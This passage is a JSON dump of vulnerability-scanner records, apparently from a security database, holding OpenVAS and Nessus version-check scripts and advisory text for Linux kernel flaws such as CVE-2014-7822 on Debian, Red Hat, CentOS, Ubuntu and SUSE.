ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-02-11T00:00:00", "id": 
"OPENVAS:1361412562310871312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871312", "type": "openvas", "title": "RedHat Update for kernel RHSA-2015:0164-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2015:0164-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871312\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-11 05:39:17 +0100 (Wed, 11 Feb 2015)\");\n script_cve_id(\"CVE-2014-7822\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for kernel RHSA-2015:0164-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is 
present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n * A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n * Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n * Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n * Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an 'Invalid argument'\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux (v. 
5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0164-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-February/msg00016.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310882118", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882118", "type": "openvas", "title": "CentOS Update for kernel CESA-2015:0164 centos5", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# CentOS Update for kernel CESA-2015:0164 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882118\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 05:28:11 +0100 (Thu, 12 Feb 2015)\");\n script_cve_id(\"CVE-2014-7822\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for kernel CESA-2015:0164 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n * A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. 
On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n * Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n * Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n * Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an 'Invalid argument'\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0164\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-February/020932.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", 
rpm:\"kernel-PAE~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T15:28:45", "description": "The Linux kernel's splice system call did not correctly validate its\nparameters. A local, unprivileged user could exploit this flaw to\ncause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by\nthe task switching function in the Linux kernel for x86_64 based\nmachines. A local user could exploit this flaw to bypass the Address\nSpace Layout Randomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted\nfile name decoding. A local unprivileged user could exploit this flaw\nto cause a denial of service (system crash) or potentially gain\nadministrative privileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's\nSCTP (Stream Control Transmission Protocol) subsystem during INIT\ncollisions. A remote attacker could exploit this flaw to cause a\ndenial of service (system crash) or potentially escalate their\nprivileges on the system. (CVE-2015-1421).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2015-03-25T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2541-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9419"], "modified": "2015-03-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2541-1.NASL", "href": "https://www.tenable.com/plugins/nessus/82069", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2541-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82069);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n script_bugtraq_id(71794, 72356, 72643);\n script_xref(name:\"USN\", value:\"2541-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2541-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Linux kernel's splice system call did not correctly validate its\nparameters. 
A local, unprivileged user could exploit this flaw to\ncause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by\nthe task switching function in the Linux kernel for x86_64 based\nmachines. A local user could exploit this flaw to bypass the Address\nSpace Layout Randomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted\nfile name decoding. A local unprivileged user could exploit this flaw\nto cause a denial of service (system crash) or potentially gain\nadministrative privileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's\nSCTP (Stream Control Transmission Protocol) subsystem during INIT\ncollisions. A remote attacker could exploit this flaw to cause a\ndenial of service (system crash) or potentially escalate their\nprivileges on the system. (CVE-2015-1421).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2541-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2541-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-generic\", pkgver:\"3.2.0-79.115\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-generic-pae\", pkgver:\"3.2.0-79.115\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-highbank\", pkgver:\"3.2.0-79.115\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-virtual\", pkgver:\"3.2.0-79.115\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n 
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:22:52", "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\nvarious security and bugfixes.\n\nThese features were added :\n\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array\n support (bsc#854824).\n\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00\n (bsc#854817).\n\nFollowing security bugs were fixed :\n\n - CVE-2015-1805: iov overrun for failed atomic copy could\n have lead to DoS or privilege escalation (bsc#933429).\n\n - CVE-2015-3212: A race condition in the way the Linux\n kernel handled lists of associations in SCTP sockets\n could have lead to list corruption and kernel panics\n (bsc#936502).\n\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi\n driver (bsc#931988).\n\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash.\n It occurred while fetching inode information from a\n corrupted/malicious udf file system image (bsc#933907).\n\n - CVE-2015-4692: DoS via NULL pointer dereference in\n kvm_apic_has_events function (bsc#935542).\n\n - CVE-2015-5364: Remote DoS via flood of UDP packets with\n invalid checksums (bsc#936831).\n\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications\n via flood of UDP packets with invalid checksums\n (bsc#936831).\n\nSecurity issues already fixed in the previous update but not\nreferenced by CVE :\n\n - CVE-2014-9728: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9729: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9730: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were 
vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9731: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to\n information leakage (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2015-08-03T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : SUSE Linux Enterprise 12 kernel (SUSE-SU-2015:1324-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4692", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3212", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-1805"], "modified": 